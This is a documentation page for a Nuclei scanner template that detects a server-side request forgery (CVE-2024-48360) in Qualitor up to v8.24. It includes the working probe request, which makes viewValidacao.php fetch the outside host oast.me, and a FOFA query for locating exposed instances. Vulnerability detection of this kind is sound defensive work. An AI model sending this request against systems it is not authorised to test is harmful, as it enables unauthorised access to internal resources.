Qualitor <= v8.24 - Server-Side Request Forgery
ID: CVE-2024-48360
Severity: high
Author: s4e-io
Tags: cve,cve2024,ssrf,qualitor
Description
Section titled “Description”Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php.
YAML Source
Section titled “YAML Source”id: CVE-2024-48360
info: name: Qualitor <= v8.24 - Server-Side Request Forgery author: s4e-io severity: high description: | Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php. reference: - https://github.com/OpenXP-Research/CVE-2024-48360 - https://packetstormsecurity.com/files/182427/Qualitor-8.24-Server-Side-Request-Forgery.html - https://nvd.nist.gov/vuln/detail/CVE-2024-48360 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-48360 cwe-id: CWE-918 epss-score: 0.00043 epss-percentile: 0.09945 metadata: verified: true max-request: 2 vendor: qualitor product: qualitor fofa-query: icon_hash="-1217039701" tags: cve,cve2024,ssrf,qualitor
flow: http(1) && http(2)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(tolower(body), "qualitor")' - "status_code == 200" condition: and internal: true
- raw: - | GET /html/ad/adformmobile/request/viewValidacao.php?url=oast.me HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "<h1> Interactsh Server </h1>"
- type: status status: - 200# digest: 4a0a00473045022100ff5cfb8a4a836379b4cac49a5facd903b555cbfd64aa7ad5b9c596573f5278db02200fbbffabcc2ca86d0c30a3eb686ffcadfd4c5703c42583b104ac4c233e6aee47:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-48360.yaml"